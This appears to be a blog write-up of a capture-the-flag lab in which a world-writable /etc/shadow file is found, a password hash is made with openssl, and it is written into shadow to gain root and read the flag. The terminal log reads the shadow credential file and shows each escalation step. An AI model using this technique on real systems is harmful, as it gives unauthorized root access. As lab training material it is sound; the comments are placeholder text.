Baha

Attack Defense | Permissions Matter

Brand 0 comments May 07, 2019

Scenario | The admin was tasked to create a replica of an existing Linux system. He copied the entire filesystem to his computer, made modifications to some files and then copied it onto the newly provisioned system. Unfortunately, in his haste to set the new system up, he forgot to take care of permission sets.

I spent a bunch of time…… like a whole bunch of time doing a bunch of stuff I had no business doing. Like: Searching directories, searching logs, versions, history, etc. All it really took was looking at two file permissions. {smh}. We have rw-rw-rw access on the /etc/shadow file. This means we can genrate our own hash and insert it into the file ultimately creating the root password.

					student@attackdefense:/home$ cat /root/^C
					student@attackdefense:/home$ cat /etc/shadow
					root::17764:0:99999:7::: daemon::17764:0:99999:7:::
					bin::17764:0:99999:7::: sys::17764:0:99999:7:::
					sync::17764:0:99999:7::: games::17764:0:99999:7:::
					man::17764:0:99999:7::: lp::17764:0:99999:7:::
					mail::17764:0:99999:7::: news::17764:0:99999:7:::
					uucp::17764:0:99999:7::: proxy::17764:0:99999:7:::
					www-data::17764:0:99999:7::: backup::17764:0:99999:7:::
					list::17764:0:99999:7::: irc::17764:0:99999:7:::
					gnats::17764:0:99999:7::: nobody::17764:0:99999:7:::
					_apt:*:17764:0:99999:7:::
					student:!:17797::::::
					student@attackdefense:/home$ ls -al /etc/shadow
					-rw-rw-rw- 1 root shadow 523 Sep 23 2018 /etc/shadow
					student@attackdefense:/home$ nano
					bash: nano: command not found
					student@attackdefense:/home$ openssl passwd -1 salt root pass123
					$1$4Gjx3rAa$YicC3Qx6DzMxWxtecIC/t.
					$1$57lINf0T$eJvoyiH1ye5ovOtlD.Mx21
					$1$UcKCqfNO$rPBh7zISXtnPmbOVHkxFF/
					student@attackdefense:/home$ openssl passwd -1 -salt root pass123
					$1$root$quimBCDAqK3JX3mbeqrrD1
					student@attackdefense:/home$ vi /etc/shadow
					student@attackdefense:/home$ $1$root$quimBCDAqK3JX3mbeqrrD1^C
					student@attackdefense:/home$ vi /etc/shadow
					student@attackdefense:/home$ su root
					Password:
					root@attackdefense:/home# cd /root/
					root@attackdefense:~# ls
					flag
					root@attackdefense:~# cat flag
					e62ab67ddff744d60cbb6232feaefc4d
					

Comments

  • Reply

    Alex Doe

    Aug 15, 2018 at 8:11 am

    Morbi ut faucibus nulla, at fringilla est. Morbi lacinia sagittis purus.

    • Kriss Doe

      Aug 15, 2018 at 8:11 am

      Morbi ut faucibus nulla, at fringilla est. Morbi lacinia sagittis purus, nec dapibus felis tempus in. Quisque eget elementum sem, cursus tristique orci.

  • Reply

    Emma Doe

    Aug 15, 2018 at 8:11 am

    Morbi ut faucibus nulla, at fringilla est. Morbi lacinia sagittis purus.

Leave a comment

Thank you, your message has been sent.
Error occurred while sending email. Please try again later.